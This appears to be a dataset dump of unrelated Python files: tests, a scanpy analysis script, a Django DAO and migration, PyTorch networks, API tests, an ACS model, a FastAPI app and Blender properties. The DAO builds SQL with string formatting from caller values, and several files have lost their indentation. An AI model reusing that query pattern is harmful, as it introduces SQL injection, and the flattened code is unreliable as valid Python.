summary_data = {'a': 1, 'b': {'c': 2, 'd': 3}, 'e': [1, 2, 3]}
filename = common.write_summary(summary_data, tmpdir.strpath, 'foo', 'bar')
assert os.path.basename(filename) == 'foo_barsummary.json'
summary_data_from_file = common.read_json_file(filename)
assert summary_data_from_file == summary_data
def test_file_exists_or_exit():
with pytest.raises(SystemExit) as exception_info:
common.file_exists_or_exit('foo.bar.baz')
assert exception_info.value.code == 1
assert common.file_exists_or_exit(__file__) is None
| nilq/baby-python | python |
# compare gene numbers in different samples
import pandas as pd
import scanpy as sc
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
from scipy.stats import ttest_ind
import scipy.stats as stats
import scikit_posthocs as sp
#-------------------variable--------------------------------
fmt='png'
fd_in='./out/a00_preprocess_00_pp'
fd_out='./out/a01_plot-pp_00_compare'
l_sample=['Ctrl', 'MethFix', 'RNAlater']
dic_cmap={'Ctrl': '#4287f5', 'MethFix': '#f5a142', 'RNAlater': '#4bf542'}
#--------------------setup---------------------------------
Path(fd_out).mkdir(exist_ok=True, parents=True)
#--------------------function----------------------------
def get_gene_cnt(prefix, l_sample=l_sample, fd_in=fd_in):
'''count genes in each adata, and concat count dfs
'''
#1. add gene count df to list
l_df=[]
for sample in l_sample:
adata=sc.read(f'{fd_in}/{prefix}_{sample}.h5ad')
sc.pp.filter_cells(adata, min_genes=0) #this will count genes in each cell
l_df.append(adata.obs)
#2. concat df
df=pd.concat(l_df)
return df
def plot_gene(df, f_out, title, dic_cmap=dic_cmap, ylim=None):
#1. plot
sns.set()
fig, ax=plt.subplots(figsize=(8, 5))
ax=sns.violinplot(x='sample', y='n_genes', data=df, hue='sample', linewidth=0.5, width=1.5, palette=dic_cmap)
#2. adjust
ax.set_title(title, fontsize=20, pad=15, weight='medium')
plt.xlabel('')
plt.ylabel('Gene Number', fontsize=22, labelpad=15, weight='medium')
plt.xticks([-0.5, 1, 2.5], fontsize=22, rotation=0, va='center')
ax.tick_params(axis='x', which='major', pad=15)
plt.xlim([-1, 3])
plt.ylim(ylim)
ax.get_legend().remove()
#3. save
plt.tight_layout()
plt.savefig(f_out, dpi=300)
plt.close()
return
############################################################################
#----------------------raw data------------------------------
prefix='raw'
#1. count df
df=get_gene_cnt(prefix)
##2. plot
#f_out=f'{fd_out}/{prefix}_gene.{fmt}'
#title=f'Gene Numbers ({prefix.capitalize()})'
#plot_gene(df, f_out, title, ylim=[-1000, 16000])
##3. calculate p value
#ctrl=df.loc[df['sample']=='Ctrl']['n_genes']
#meth=df.loc[df['sample']=='MethFix']['n_genes']
#later=df.loc[df['sample']=='RNAlater']['n_genes']
#t1, p1=ttest_ind(ctrl, meth)
#print(p1) #0
#t2, p2=ttest_ind(ctrl, later)
#print(p2) #0
#t3, p3=ttest_ind(meth, later)
#print(p3) #0.03836
#---------------------anova------------------------------------
##1. get data
#l_ctrl=df.loc[df['sample']=='Ctrl', ['n_genes']]['n_genes'].tolist()
#l_meth=df.loc[df['sample']=='MethFix', ['n_genes']]['n_genes'].tolist()
#l_later=df.loc[df['sample']=='RNAlater', ['n_genes']]['n_genes'].tolist()
#l_all=[l_ctrl, l_meth, l_later]
##2. avova
#fvalue, pvalue=stats.f_oneway(l_ctrl, l_meth, l_later)
#print(fvalue, pvalue) #4148.3173795985 0.0
##3. post hoc ttest
#p=sp.posthoc_conover(l_all, p_adjust='holm')
#print(p)
'''
1 2 3
1 -1.0 0.000000 0.000000
2 0.0 -1.000000 0.880754
3 0.0 0.880754 -1.000000
'''
#########################################################################
##----------------------cleaned data------------------------------
#prefix='clean'
##1. count df
#df=get_gene_cnt(prefix)
##2. plot
#f_out=f'{fd_out}/{prefix}_gene.{fmt}'
#title=f'Gene Numbers ({prefix.capitalize()})'
#plot_gene(df, f_out, title, ylim=[0, 4500])
##3. calculate p value
#ctrl=df.loc[df['sample']=='Ctrl']['n_genes']
#meth=df.loc[df['sample']=='MethFix']['n_genes']
#later=df.loc[df['sample']=='RNAlater']['n_genes']
#t1, p1=ttest_ind(ctrl, meth)
#print(p1) #0
#t2, p2=ttest_ind(ctrl, later)
#print(p2) #0
#t3, p3=ttest_ind(meth, later)
#print(p3) #6.629720921642305e-78
| nilq/baby-python | python |
#
# Este arquivo é parte do programa multi_agenda
#
# Esta obra está licenciada com uma
# Licença Creative Commons Atribuição 4.0 Internacional.
# (CC BY 4.0 Internacional)
#
# Para ver uma cópia da licença, visite
# https://creativecommons.org/licenses/by/4.0/legalcode
#
# WELLINGTON SAMPAIO - [email protected]
# https://www.linkedin.com/in/wellsampaio/
#
import objetos.financeiro.TipoConta as TipoConta
import objetos.dbConn.CRUD as CRUD
class TipoContaDAO(CRUD.CRUD):
__sqlInsert = ""
__sqlUpdate = ""
def __init__(self):
schema = "financeiro"
tabela = "tiposContas"
        self._pk = "codTipoConta"
        super().__init__(schema, tabela, self._pk)
self.__sqlInsert = super().strINSERT()
self.__sqlUpdate = super().strUPDATE()
# ==================================== CRUD ====================================
# ==============================================================================
def insert(self, tipoConta):
self.setStatement(tipoConta, self.__sqlInsert)
def select(self, pk):
obj = TipoConta.TipoConta()
super().setSelect(pk, obj)
return obj
def update(self, tipoConta):
self.setStatement(tipoConta, self.__sqlUpdate)
    def setStatement2(self, obj):
        # ``self.__pk`` would be name-mangled to _TipoContaDAO__pk and never
        # resolve here; the primary-key name is kept on self._pk instead.
        getPk = getattr(obj,
            "get" +
            self._pk[:1].upper() +
            self._pk[1:]
        )
        return getPk()
# ==================================== CRUD ====================================
# ==============================================================================
def getLista(self):
sql = \
"""
SELECT
*
FROM
tiposContas
ORDER BY
codTipoConta
;
"""
return super().getList(sql)
def listaPrincipais(self):
sql = \
"""
SELECT
*
FROM
tiposContas
WHERE
tipoContaAtivo = 1
ORDER BY
TipoConta
;
"""
return super().getList(sql)
def naoListadasNoPeriodo(self, dtRef):
sql = \
"""
SELECT
*
FROM
tiposContas
WHERE
codTipoConta NOT IN(
SELECT
codTipoConta
FROM
contas
WHERE
strftime('%Y-%m',dtVencimento) = '{}'
) AND
tipoContaAtivo = 1
ORDER BY
tipoConta
;
""".format(dtRef)
return super().getList(sql)
def contaOcorrenciasPelaReferencia(self, codTipoConta, dtRef, tipoRef):
if tipoRef == "pgto":
tipoRef = "receita.mesReferencia"
#elif tipoRef = "venc":
else:
tipoRef = "contas.dtVencimento"
sql = \
"""
SELECT COUNT(codConta) FROM contas LEFT JOIN receita ON contas.codReceitaPagadora = receita.codReceita
WHERE strftime("%Y-%m", {}) = '{}' AND codTipoConta = {};
""".format(tipoRef, dtRef, codTipoConta)
return "{0:.0f}".format(super().getValue(sql, 0.0))
def listaCmb(self):
sql = \
"""
SELECT
*
FROM
tiposContas
ORDER BY
tipoConta
;
"""
return super().getList(sql)
| nilq/baby-python | python |
# Generated by Django 2.2.16 on 2020-09-21 16:18
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contest', '0001_initial'),
('lecture', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='signup_class',
name='contest',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contest.Contest'),
),
]
| nilq/baby-python | python |
import torch.nn as nn
import torch.nn.functional as F
from torch import cat, stack, sqrt
class MLPNetwork(nn.Module):
"""
MLP network (can be used as value or policy)
"""
def __init__(self, input_dim, out_dim, hidden_dim=64, nonlin=F.relu,
constrain_out=False, norm_in=True, discrete_action=True):
"""
Inputs:
input_dim (int): Number of dimensions in input
out_dim (int): Number of dimensions in output
hidden_dim (int): Number of hidden dimensions
nonlin (PyTorch function): Nonlinearity to apply to hidden layers
"""
super(MLPNetwork, self).__init__()
if norm_in: # normalize inputs
self.in_fn = nn.BatchNorm1d(input_dim)
self.in_fn.weight.data.fill_(1)
self.in_fn.bias.data.fill_(0)
else:
self.in_fn = lambda x: x
self.fc1 = nn.Linear(input_dim, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, hidden_dim)
self.fc3 = nn.Linear(hidden_dim, out_dim)
self.nonlin = nonlin
if constrain_out and not discrete_action:
# initialize small to prevent saturation
self.fc3.weight.data.uniform_(-3e-3, 3e-3)
self.out_fn = F.tanh
else: # logits for discrete action (will softmax later)
self.out_fn = lambda x: x
def forward(self, X):
"""
Inputs:
X (PyTorch Matrix): Batch of observations
Outputs:
out (PyTorch Matrix): Output of network (actions, values, etc)
"""
h1 = self.nonlin(self.fc1(self.in_fn(X)))
h2 = self.nonlin(self.fc2(h1))
out = self.out_fn(self.fc3(h2))
return out
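# Quick shape check (hypothetical sizes): a batch of 5 observations with 10
# features maps to 5 output vectors of dimension 2.
#   net = MLPNetwork(10, 2)
#   out = net(torch.randn(5, 10))  # -> shape (5, 2)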
class ConvMLPNetwork(nn.Module):
"""
Conv + MLP network (can be used as value or policy)
"""
def __init__(self, input_dim, out_dim):
"""
Inputs:
input_dim (int): Number of dimensions in input
out_dim (int): Number of dimensions in output
hidden_dim (int): Number of hidden dimensions
nonlin (PyTorch function): Nonlinearity to apply to hidden layers
"""
super(ConvMLPNetwork, self).__init__()
self.in_fn = nn.BatchNorm2d(3)
self.in_fn.weight.data.fill_(1)
self.in_fn.bias.data.fill_(0)
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(3, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
self.mlpnet = nn.Sequential(
nn.Linear(input_dim, 64),
nn.Tanh(),
nn.Linear(64, out_dim)
)
self.apply(init_params)
def forward(self, obss, actions=None, critic=False, debug=False):
"""
Inputs:
X (PyTorch Matrix): Batch of observations
Outputs:
out (PyTorch Matrix): Output of network (actions, values, etc)
"""
if not critic:
x = obss
if debug:
print('----------')
print('obss:')
print(x)
if len(x.shape) < 4:
x = x.unsqueeze(0).transpose(1, 3).transpose(2, 3)
else:
x = x.transpose(1, 3).transpose(2, 3)
x = self.in_fn(x)
x = self.image_conv(x)
x = x.reshape(x.shape[0], -1)
if debug:
print('----------')
print('conv out:')
print(x)
out = self.mlpnet(x)
if debug:
print('----------')
print('mlp out:')
print(out)
return out
else:
x = stack(obss)
num_agents = x.shape[0]
num_batches = x.shape[1]
x = x.reshape(-1, *x.shape[-3:])
x = x.transpose(1, 3).transpose(2, 3)
x = self.in_fn(x)
x = self.image_conv(x)
x = x.reshape(x.shape[0], -1)
x = x.reshape(num_agents, num_batches, x.shape[1])
act = stack(actions)
concat = cat((*x, *act), dim=1)
out = self.mlpnet(concat)
return out
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
| nilq/baby-python | python |
import re
from datetime import date, datetime, timezone
from urllib.parse import urljoin, urlparse
import pytest
from swpt_debtors import procedures as p
from swpt_debtors import models as m
@pytest.fixture(scope='function')
def client(app, db_session):
return app.test_client()
@pytest.fixture(scope='function')
def debtor(db_session):
debtor = m.Debtor(debtor_id=123, status_flags=0)
debtor.activate()
db_session.add(debtor)
db_session.commit()
return p.get_debtor(123)
def _get_all_pages(client, url, page_type, streaming=False):
r = client.get(url)
assert r.status_code == 200
data = r.get_json()
assert data['type'] == page_type
assert urlparse(data['uri']) == urlparse(url)
if streaming:
assert 'next' in data or 'forthcoming' in data
assert 'next' not in data or 'forthcoming' not in data
else:
assert 'forthcoming' not in data
items = data['items']
assert isinstance(items, list)
if 'next' in data:
items.extend(_get_all_pages(client, urljoin(url, data['next']), page_type, streaming))
return items
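# _get_all_pages follows each page's "next" link recursively and concatenates
# the "items" arrays, so several ObjectReferencesPage responses collapse into
# one flat list of {'uri': ...} dicts for the assertions below.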
def test_auto_generate_debtor_id(client):
r = client.post('/debtors/.debtor-reserve', json={})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorReservation'
assert isinstance(data['debtorId'], str)
assert isinstance(data['reservationId'], int)
assert datetime.fromisoformat(data['validUntil'])
assert datetime.fromisoformat(data['createdAt'])
def test_create_debtor(client):
r = client.get('/debtors/4294967296/')
assert r.status_code == 403
r = client.post('/debtors/4294967296/reserve', headers={'X-Swpt-User-Id': 'INVALID_USER_ID'}, json={})
assert r.status_code == 403
r = client.post('/debtors/2/reserve', headers={'X-Swpt-User-Id': 'debtors:4294967296'}, json={})
assert r.status_code == 403
r = client.post('/debtors/4294967296/reserve', json={})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorReservation'
assert data['debtorId'] == '4294967296'
assert isinstance(data['reservationId'], int)
assert datetime.fromisoformat(data['validUntil'])
assert datetime.fromisoformat(data['createdAt'])
reservation_id = data['reservationId']
r = client.post('/debtors/4294967296/reserve', json={})
assert r.status_code == 409
r = client.get('/debtors/4294967296/')
assert r.status_code == 403
r = client.post('/debtors/4294967296/activate', json={
'reservationId': 123,
})
assert r.status_code == 422
assert 'reservationId' in r.get_json()['errors']['json']
r = client.post('/debtors/4294967296/activate', json={
'reservationId': reservation_id,
})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/4294967296/'
assert data['identity'] == {'type': 'DebtorIdentity', 'uri': 'swpt:4294967296'}
assert data['transfersList'] == {'uri': '/debtors/4294967296/transfers/'}
assert data['createTransfer'] == {'uri': '/debtors/4294967296/transfers/'}
assert datetime.fromisoformat(data['createdAt'])
r = client.post('/debtors/4294967296/activate', json={
'reservationId': reservation_id,
})
assert r.status_code == 200
r = client.post('/debtors/8589934591/activate', json={
'reservationId': 123,
})
assert r.status_code == 422
assert 'reservationId' in r.get_json()['errors']['json']
r = client.post('/debtors/8589934591/activate', json={})
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/8589934591/'
assert data['balance'] == 0
assert datetime.fromisoformat(data['createdAt'])
assert 'info' not in data
r = client.post('/debtors/8589934591/activate', json={})
assert r.status_code == 409
r = client.get('/debtors/4294967296/')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/4294967296/'
assert data['balance'] == 0
assert datetime.fromisoformat(data['createdAt'])
r = client.get('/debtors/8589934591/')
assert r.status_code == 200
r = client.post('/debtors/8589934591/deactivate', headers={'X-Swpt-User-Id': 'debtors:8589934591'}, json={})
assert r.status_code == 403
r = client.post('/debtors/8589934591/deactivate', headers={'X-Swpt-User-Id': 'debtors-supervisor'}, json={})
assert r.status_code == 403
r = client.post('/debtors/8589934591/deactivate', headers={'X-Swpt-User-Id': 'debtors-superuser'}, json={})
assert r.status_code == 204
r = client.post('/debtors/8589934591/deactivate', json={})
assert r.status_code == 204
r = client.get('/debtors/8589934591/')
assert r.status_code == 403
r = client.post('/debtors/8589934591/deactivate', json={})
assert r.status_code == 204
def test_get_debtors_list(client):
r = client.post('/debtors/4294967296/reserve', json={})
assert r.status_code == 200
r = client.post('/debtors/4294967297/activate', json={})
assert r.status_code == 200
r = client.post('/debtors/4294967298/activate', json={})
assert r.status_code == 200
r = client.post('/debtors/8589934591/activate', json={})
assert r.status_code == 200
r = client.get('/debtors/.list')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorsList'
assert data['uri'] == '/debtors/.list'
assert data['itemsType'] == 'ObjectReference'
assert data['first'] == '/debtors/9223372036854775808/enumerate'
entries = _get_all_pages(client, data['first'], page_type='ObjectReferencesPage')
assert entries == [
{'uri': '/debtors/4294967297/'},
{'uri': '/debtors/4294967298/'},
{'uri': '/debtors/8589934591/'},
]
def test_get_debtor(client, debtor):
r = client.get('/debtors/123/')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Debtor'
assert data['uri'] == '/debtors/123/'
assert data['config'] == {
'type': 'DebtorConfig',
'uri': '/debtors/123/config',
'configData': '',
'latestUpdateId': 1,
'latestUpdateAt': '1970-01-01T00:00:00+00:00',
'debtor': {'uri': '/debtors/123/'},
}
assert data['transfersList'] == {'uri': '/debtors/123/transfers/'}
assert data['createTransfer'] == {'uri': '/debtors/123/transfers/'}
assert data['balance'] == 0
assert datetime.fromisoformat(data['createdAt'])
assert data['identity'] == {'type': 'DebtorIdentity', 'uri': 'swpt:123'}
assert data['noteMaxBytes'] == 0
assert 'configError' not in data
assert 'account' not in data
def test_change_debtor_config(client, debtor):
r = client.get('/debtors/123/config')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorConfig'
assert data['uri'] == '/debtors/123/config'
assert data['configData'] == ''
assert data['latestUpdateId'] == 1
latest_update_at = data['latestUpdateAt']
assert datetime.fromisoformat(latest_update_at)
assert data['debtor'] == {'uri': '/debtors/123/'}
request = {
'configData': 'TEST',
'latestUpdateId': 2
}
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 200
r = client.get('/debtors/123/config')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'DebtorConfig'
assert data['uri'] == '/debtors/123/config'
assert data['configData'] == 'TEST'
assert data['latestUpdateId'] == 2
assert datetime.fromisoformat(data['latestUpdateAt'])
assert latest_update_at != data['latestUpdateAt']
assert data['debtor'] == {'uri': '/debtors/123/'}
empty_request = {
'configData': '',
'latestUpdateId': 2,
}
r = client.patch('/debtors/666/config', json=empty_request)
assert r.status_code == 404
r = client.patch('/debtors/123/config', json=empty_request)
assert r.status_code == 409
data = r.get_json()
for _ in range(9):
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 200
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 403
def test_initiate_running_transfer(client, debtor):
r = client.get('/debtors/666/transfers/')
assert r.status_code == 404
r = client.get('/debtors/123/transfers/')
assert r.status_code == 200
data = r.get_json()
assert data['debtor'] == {'uri': '/debtors/123/'}
assert data['type'] == 'TransfersList'
assert data['uri'] == '/debtors/123/transfers/'
assert data['items'] == []
json_request_body = {
'amount': 1000,
'noteFormat': 'fmt',
'note': 'test',
'recipient': {'uri': 'swpt:123/1111'},
'transferUuid': '123e4567-e89b-12d3-a456-426655440000',
}
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 201
data = r.get_json()
assert data['amount'] == 1000
assert datetime.fromisoformat(data['initiatedAt'])
assert 'result' not in data
assert data['recipient'] == {'type': 'AccountIdentity', 'uri': 'swpt:123/1111'}
assert data['type'] == 'Transfer'
assert data['uri'] == '/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
assert data['noteFormat'] == 'fmt'
assert data['note'] == 'test'
assert data['transfersList'] == {'uri': '/debtors/123/transfers/'}
assert r.headers['Location'] == 'http://example.com/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
r = client.get('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000')
assert r.status_code == 200
data = r.get_json()
assert data['type'] == 'Transfer'
assert data['uri'] == '/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
assert data['amount'] == 1000
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 303
assert r.headers['Location'] == 'http://example.com/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000'
json_request_body['amount'] += 1
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 409
r = client.post('/debtors/123/transfers/', json={**json_request_body, **{'recipient': {'uri': 'INVALID'}}})
assert r.status_code == 422
r = client.post('/debtors/123/transfers/', json={**json_request_body, **{'recipient': {'uri': 'swpt:555/1111'}}})
assert r.status_code == 422
r = client.post('/debtors/555/transfers/', json={**json_request_body, **{'recipient': {'uri': 'swpt:555/1111'}}})
assert r.status_code == 404
r = client.get('/debtors/123/transfers/')
assert r.status_code == 200
data = r.get_json()
assert sorted(data['items']) == [
{'uri': '123e4567-e89b-12d3-a456-426655440000'},
]
r = client.delete('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440001')
assert r.status_code == 204
r = client.get('/debtors/123/transfers/')
assert r.status_code == 200
data = r.get_json()
assert sorted(data['items']) == [
{'uri': '123e4567-e89b-12d3-a456-426655440000'},
]
for i in range(2, 12):
suffix = '{:0>4}'.format(i)
json_request_body = {
'amount': 1,
'recipient': {'uri': 'swpt:123/1111'},
'transferUuid': f'123e4567-e89b-12d3-a456-42665544{suffix}',
}
r = client.post('/debtors/123/transfers/', json=json_request_body)
if i == 11:
assert r.status_code == 403
else:
assert r.status_code == 201
def test_cancel_running_transfer(client, debtor):
json_request_body = {
'amount': 1000,
'note': 'test',
'recipient': {'uri': 'swpt:123/1111'},
'transferUuid': '123e4567-e89b-12d3-a456-426655440000',
}
r = client.post('/debtors/123/transfers/', json=json_request_body)
assert r.status_code == 201
data = r.get_json()
assert 'result' not in data
r = client.post('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440001', json={})
assert r.status_code == 404
r = client.post('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000', json={})
assert r.status_code == 200
r = client.get('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000')
assert r.status_code == 200
data = r.get_json()
result = data['result']
error = result['error']
assert error['errorCode'] == 'CANCELED_BY_THE_SENDER'
r = client.post('/debtors/123/transfers/123e4567-e89b-12d3-a456-426655440000', json={})
assert r.status_code == 200
def test_unauthorized_debtor_id(debtor, client):
json_request_body = {
'type': 'DebtorConfig',
'configData': '',
'latestUpdateId': 2,
}
r = client.get('/debtors/123/')
assert r.status_code == 200
r = client.get('/debtors/123/', headers={'X-Swpt-User-Id': 'INVALID_USER_ID'})
assert r.status_code == 403
r = client.patch('/debtors/123/config', json=json_request_body, headers={'X-Swpt-User-Id': 'debtors-supervisor'})
assert r.status_code == 403
r = client.patch('/debtors/123/config', json=json_request_body, headers={'X-Swpt-User-Id': 'debtors:666'})
assert r.status_code == 403
r = client.patch('/debtors/123/config', json=json_request_body, headers={'X-Swpt-User-Id': 'debtors:123'})
assert r.status_code == 200
with pytest.raises(ValueError):
r = client.get(
'/debtors/18446744073709551615/',
json=json_request_body,
headers={'X-Swpt-User-Id': 'debtors:18446744073709551616'},
)
def test_redirect_to_debtor(client, debtor):
r = client.get('/debtors/.debtor')
assert r.status_code == 204
r = client.get('/debtors/.debtor', headers={'X-Swpt-User-Id': 'debtors:2'})
assert r.status_code == 303
assert r.headers['Location'] == 'http://example.com/debtors/2/'
r = client.get('/debtors/.debtor', headers={'X-Swpt-User-Id': 'debtors:18446744073709551615'})
assert r.status_code == 303
assert r.headers['Location'] == 'http://example.com/debtors/18446744073709551615/'
def test_redirect_to_latest_info(client, debtor):
r = client.get('/debtors/123/public')
assert r.status_code == 404
request = {
'configData': '{"info": {"iri": "https://example.com/"}}',
'latestUpdateId': 2
}
r = client.patch('/debtors/123/config', json=request)
assert r.status_code == 200
debtor = p.get_debtor(123)
current_ts = datetime.now(tz=timezone.utc)
p.process_account_update_signal(
debtor_id=debtor.debtor_id,
creditor_id=p.ROOT_CREDITOR_ID,
creation_date=date(2020, 1, 1),
last_change_ts=current_ts,
last_change_seqnum=1,
principal=0,
interest_rate=0.0,
last_config_ts=debtor.last_config_ts,
last_config_seqnum=debtor.last_config_seqnum,
negligible_amount=p.HUGE_NEGLIGIBLE_AMOUNT,
config_data='INCORRECT CONFIG DATA',
config_flags=debtor.config_flags,
account_id='',
transfer_note_max_bytes=0,
ts=current_ts,
ttl=10000000,
)
r = client.get('/debtors/123/public')
assert r.status_code == 404
p.process_account_update_signal(
debtor_id=debtor.debtor_id,
creditor_id=p.ROOT_CREDITOR_ID,
creation_date=date(2020, 1, 1),
last_change_ts=current_ts,
last_change_seqnum=2,
principal=0,
interest_rate=0.0,
last_config_ts=debtor.last_config_ts,
last_config_seqnum=debtor.last_config_seqnum,
negligible_amount=p.HUGE_NEGLIGIBLE_AMOUNT,
config_data=debtor.config_data,
config_flags=debtor.config_flags,
account_id='',
transfer_note_max_bytes=0,
ts=current_ts,
ttl=10000000,
)
r = client.get('/debtors/123/public')
assert r.status_code == 302
assert r.headers['Location'] == 'https://example.com/'
assert r.headers['Cache-Control'] == 'max-age=86400'
def test_save_document(client, debtor):
r = client.get('/debtors/123/documents/0/public')
assert r.status_code == 404
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=101 * b'1',
)
assert r.status_code == 413
content = 100 * b'1'
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 201
assert r.content_type == 'application/octet-stream'
assert r.get_data() == content
location = r.headers['Location']
    m = re.match(r'http://example.com/debtors/123/documents/(\d+)/public', location)
assert m is not None
document_id = int(m.group(1))
assert document_id >= 0
r = client.get(location)
assert r.status_code == 200
assert r.content_type == 'application/octet-stream'
assert r.get_data() == content
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 201
assert r.content_type == 'application/octet-stream'
assert r.get_data() == content
assert location != r.headers['Location']
r = client.post(
'/debtors/123/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 403
r = client.post(
'/debtors/666/documents/',
content_type='application/octet-stream',
data=content,
)
assert r.status_code == 404
| nilq/baby-python | python |
from lxml import etree
from defusedxml.lxml import fromstring
import uuid
from django.db import models
from django.http import HttpResponse
from django.urls import reverse
from django.core.exceptions import ObjectDoesNotExist
from acs.response import get_soap_envelope
from acs.models import AcsHttpBaseModel
from acs.utils import create_xml_document
class AcsHttpRequest(AcsHttpBaseModel):
""" Every HTTP request received on the ACS server URL is saved as an instance
of this model. """
acs_session = models.ForeignKey('acs.AcsSession', related_name='acs_http_requests', on_delete=models.PROTECT)
rpc_response_to = models.ForeignKey('acs.AcsHttpResponse', related_name='rpc_responses', null=True, blank=True, on_delete=models.PROTECT) # a foreignkey to the http response containing the acs rpc request which triggered the current http request (where relevant)
request_headers = models.TextField(blank=True)
request_xml_valid = models.BooleanField(default=False)
request_soap_valid = models.BooleanField(default=False)
class Meta:
ordering = ['-created_date']
def __str__(self):
return str(self.tag)
def get_absolute_url(self):
return reverse('acshttprequest_detail', kwargs={'pk': self.pk})
@property
def is_request(self):
return True
@property
def is_response(self):
return False
def get_response(self, empty_response=False):
'''
get_response() is called when the CPE is waiting for the ACS
to do something. This happens after the CPE does an empty POST, or after
the CPE has responded to an RPC call initiated by the ACS. It simply pops
a job from the queue and returns it in a http response.
'''
job = False
if not empty_response:
### get the first job from the queue (if any)
#jobs = AcsQueueJob.objects.filter(acs_device=self.acs_session.acs_device, processed=False).order_by('created_date')
jobs = self.acs_session.acs_device.acs_queue_jobs.filter(processed=False).order_by('created_date')
self.acs_session.acs_log("Found %s unprocessed acs queue jobs for the device %s" % (jobs.count(), self.acs_session.acs_device))
if jobs:
job = jobs.first()
self.acs_session.acs_log("Picked job %s" % job)
if not empty_response and job:
### get blank SOAP response envelope
response_cwmp_id = uuid.uuid4().hex
root, body = get_soap_envelope(response_cwmp_id, self.acs_session)
### add the cwmp soap object to the soap body
cwmpobj = fromstring(job.cwmp_rpc_object_xml.encode('utf-8'))
body.append(cwmpobj)
### get the rpc method
response_cwmp_rpc_method = job.cwmp_rpc_method
### put HTTP response together
output = etree.tostring(root, encoding='utf-8', xml_declaration=True)
response = HttpResponse(output, content_type='text/xml; charset=utf-8')
else:
### no jobs in queue for this acs device (or an empty response was requested), so return empty body to end this cwmp session
response = HttpResponse(status=204)
response_cwmp_rpc_method = '(empty response body)'
response_cwmp_id = ''
### save the http response
from acs.models import AcsHttpResponse
acs_http_response = AcsHttpResponse.objects.create(
http_request=self,
fk_body=create_xml_document(xml=response.content),
cwmp_id=response_cwmp_id,
soap_element="{%s}%s" % (self.acs_session.soap_namespaces['cwmp'], response_cwmp_rpc_method),
)
self.acs_session.acs_log("Created ACS HTTP response %s" % acs_http_response)
if job:
self.acs_session.acs_log("Saving AcsQueueJob %s" % job)
### save job
job.handled_in = acs_http_response
job.processed = True
job.save()
### all good, return response
self.acs_session.acs_log("Responding to CPE %s with %s" % (self.acs_session.acs_device, response_cwmp_rpc_method))
return response
| nilq/baby-python | python |
from typing import List
from fastapi import FastAPI
from pydantic import BaseModel
app = FastAPI()
class Product(BaseModel):
id: str
class Review(BaseModel):
body: str
product: Product
class User(BaseModel):
reviews: List[Review]
USER_DATA = {
"1": User(reviews=[Review(body="Great!", product=Product(id="1"))]),
"2": User(reviews=[Review(body="Great!", product=Product(id="2"))]),
"3": User(reviews=[Review(body="Great!", product=Product(id="3"))]),
}
@app.get("/users/{id}", response_model=User)
async def get_user_review(id: str) -> User:
return USER_DATA[id]
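# Local smoke test (requires fastapi's TestClient, which depends on httpx):
# from fastapi.testclient import TestClient
# client = TestClient(app)
# assert client.get("/users/1").json()["reviews"][0]["product"]["id"] == "1"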
| nilq/baby-python | python |
import bpy
from bpy.props import *
PROP_TYPE_ICONS = {
"String": "SORTALPHA",
"Int": "CHECKBOX_DEHLT",
"Float": "RADIOBUT_OFF",
"Bool": "CHECKMARK",
"Vec2": "ORIENTATION_VIEW",
"Vec3": "ORIENTATION_GLOBAL",
"Vec4": "MESH_ICOSPHERE",
"Object": "OBJECT_DATA",
"CameraObject": "CAMERA_DATA",
"LightObject": "LIGHT_DATA",
"MeshObject": "MESH_DATA",
"SpeakerObject": "OUTLINER_DATA_SPEAKER"
}
def filter_objects(item, b_object):
if item.type == "CameraObject":
return b_object.type == "CAMERA"
if item.type == "LightObject":
return b_object.type == "LIGHT"
if item.type == "MeshObject":
return b_object.type == "MESH"
if item.type == "SpeakerObject":
return b_object.type == "SPEAKER"
if item.type == "Object":
return True
class ArmTraitPropWarning(bpy.types.PropertyGroup):
warning: StringProperty(name="Warning")
class ArmTraitPropListItem(bpy.types.PropertyGroup):
"""Group of properties representing an item in the list."""
